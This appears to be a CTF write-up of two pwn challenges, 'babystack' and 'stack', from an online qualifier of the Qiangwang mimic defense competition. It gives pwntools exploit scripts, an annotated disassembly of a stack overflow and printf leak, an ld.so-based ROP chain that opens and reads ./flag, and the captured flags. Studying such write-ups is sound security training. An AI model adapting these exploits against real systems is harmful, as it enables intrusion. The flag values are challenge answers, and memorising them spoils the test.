Write-ups: 第八届「强网」拟态防御国际精英挑战赛-线上预选赛
babystack
Information
- Category: Pwn
- Points: 500
Description
拿到属于你的 shell 吧
Get your own shell
Write-up
?
Exploit
#!/usr/bin/env python3
from pwn import ( ELF, args, context, flat, process, raw_input, remote,)
FILE = "./babystack"
HOST = "pwn-10ba42cde6.challenge.xctf.org.cn"
PORT = 9999

# Process-wide pwntools settings: verbose tube logging, the challenge binary
# as the default ELF (word size/endianness for ``flat``), and the terminal
# program pwntools uses when it opens a new window.
context.update(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch():
    """Open the target tube into the module-level ``target``.

    With the ``L`` pwntools argument a local process of ``FILE`` is started;
    otherwise a TLS connection to ``HOST:PORT`` is made.
    """
    global target
    target = process(FILE) if args.L else remote(HOST, PORT, ssl=True)
def main():
    """Interact with the babystack service, then hand the tube to the user.

    Two fixed-size inputs are sent at the ``flag1:`` and ``flag2:`` prompts;
    the second ends in the constant ``0x1337ABC``.  Sizes and value are
    specific to this challenge binary.
    """
    launch()

    target.sendafter(b"flag1:", flat(b"A" * 24))

    second = flat(b"B" * 0xF8, 0x1337ABC)
    raw_input("DEBUG")  # blocks on a prompt, presumably to attach a debugger first
    target.sendlineafter(b"flag2:", second)

    target.interactive()
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()
Flag
flag{W528uZdUsvWbiWxqon5YLvZa8x6uo8IP}
stack
Information
- Category: Pwn
- Points: 500
Description
我不需要 libc,我猜你也可以不需要
I don’t need libc, and I guess you don’t need it either
Write-up
为了「讨好」,哦不,是「迎合」,迎合 description,我用 ld……
printf 使用 rbp 定位,可以用来泄漏栈地址和其它任意地址。
; Attributes: bp-based frame
; int sub_401354()
; Reads a "name" into a 16-byte stack buffer and echoes it with printf.
sub_401354 proc near
s= byte ptr -10h                ; 0x10-byte buffer directly below the saved rbp
; __unwind {
endbr64
push    rbp
mov     rbp, rsp
sub     rsp, 10h
lea     rax, [rbp+s]
mov     edx, 10h                ; n   -- only the 0x10 bytes of s are zeroed
mov     esi, 0                  ; c
mov     rdi, rax                ; s
call    _memset
lea     rax, aCouldYouTellMe    ; "Could you tell me your name?"
mov     rdi, rax                ; s
call    _puts
lea     rax, [rbp+s]
mov     edx, 18h                ; nbytes -- 0x18 > sizeof(s): the last 8 bytes land on the saved rbp
mov     rsi, rax                ; buf
mov     edi, 0                  ; fd
call    _read
lea     rax, [rbp+s]
mov     rsi, rax
lea     rax, format             ; "Hello, %s!\n"
mov     rdi, rax                ; format
mov     eax, 0
call    _printf                 ; %s stops at a NUL; a 16-byte name leaves none in s, so the
                                ; echo continues into the bytes past s (the leak the write-up relies on).
                                ; Bounding the read to sizeof(s)-1 and terminating would close both issues.
nop
leave
retn
; } // starts at 401354
sub_401354 endp
Exploit
#!/usr/bin/env python3
from pwn import ( ELF, args, context, flat, process, raw_input, remote,)
FILE = "./pwn_patched"
HOST = "pwn-2229eb847f.challenge.xctf.org.cn"
PORT = 9999

# Process-wide pwntools settings: verbose tube logging, the (patched) challenge
# binary as the default ELF (word size/endianness for ``flat``), and the
# terminal program pwntools uses when it opens a new window.
context.update(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch():
    """Open the target tube into the module-level ``target``.

    With the ``L`` pwntools argument a local process of ``FILE`` is started;
    otherwise a TLS connection to ``HOST:PORT`` is made.
    """
    global target
    target = process(FILE) if args.L else remote(HOST, PORT, ssl=True)
def main():
    """Run the three-stage interaction against the "stack" service.

    Stage 1 sends a 16-byte name with no terminator so the ``Hello, %s`` echo
    spills the bytes past the buffer, yielding a stack address.  Stage 2
    returns into the binary's own read/printf code (addresses per the inline
    comments) to echo a value from a stack slot that is presumed to hold a
    pointer into ld.so.  Stage 3 sends a ROP chain built from offsets relative
    to that ld.so base: openat("./flag"), read into .bss, write to stdout.
    All offsets are hard-coded for this challenge's binary and ld.so build.
    """
    launch()

    # raw_input("DEBUG")
    target.sendafter(b"name?", b"A" * 0x10)
    target.recvuntil(b"A" * 0x10)
    # Six bytes following the echoed name: the leaked stack pointer.
    stack = int.from_bytes(target.recv(0x6), "little")
    ld = stack + 0xC0  # slot assumed to contain an ld.so pointer; verified by the later leak
    ret = stack + 0x20
    target.success(f"stack: {hex(stack)}")

    payload = flat(
        b"A" * 0x60,
        ret + 0x60,  # new saved rbp, so the re-entered read()/printf() address s relative to it
        0x4013D4,  # read
    )
    # raw_input("DEBUG")
    target.sendafter(b"Any thing else?", payload)

    payload = flat(
        0x401413,  # main
        b"A" * 0x58,
        ld + 0x10,
        0x40139B,  # printf
    )
    target.sendline(payload)
    target.recvuntil(b"Hello, ")
    # NOTE(review): the message says "libc", but per the variable name and the
    # write-up this is the ld.so base (0x3B2E0 is the leaked pointer's offset).
    leaked_ld = int.from_bytes(target.recv(0x6), "little") - 0x3B2E0
    target.success(f"libc: {hex(leaked_ld)}")

    target.sendlineafter(b"name?", b"")

    # Address where the "./flag" string below will sit on the stack.
    flag = stack - 0xA0
    payload = flat(
        b"./flag\x00\x00",
        b"A" * 0x60,
        # openat
        leaked_ld + 0x25E6B,  # pop rdi; ret
        -100,  # AT_FDCWD
        leaked_ld + 0x54DA,  # pop rsi; ret
        flag,
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        0x101,  # SYS_openat on x86-64
        0,
        0,
        leaked_ld + 0x16629,  # syscall; ret
        # read
        leaked_ld + 0x25E6B,  # pop rdi; ret
        0x3,  # presumably the fd openat returned
        leaked_ld + 0x54DA,  # pop rsi; ret
        elf.bss() + 0x500,  # scratch buffer in .bss
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        0,  # SYS_read
        0x1337,  # byte count
        0,
        leaked_ld + 0x16629,  # syscall; ret
        # write
        leaked_ld + 0x25E6B,  # pop rdi; ret
        0x1,  # stdout
        leaked_ld + 0x54DA,  # pop rsi; ret
        elf.bss() + 0x500,
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        1,  # SYS_write
        0x1337,
        0,
        leaked_ld + 0x16629,  # syscall; ret
    )
    raw_input("DEBUG")  # blocks on a prompt, presumably to attach a debugger before the chain runs
    target.sendafter(b"Any thing else?", payload)

    target.interactive()
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()
Flag
flag{nfRlSH0ll0o4j4kd05IA6NJWtO8DYYSk}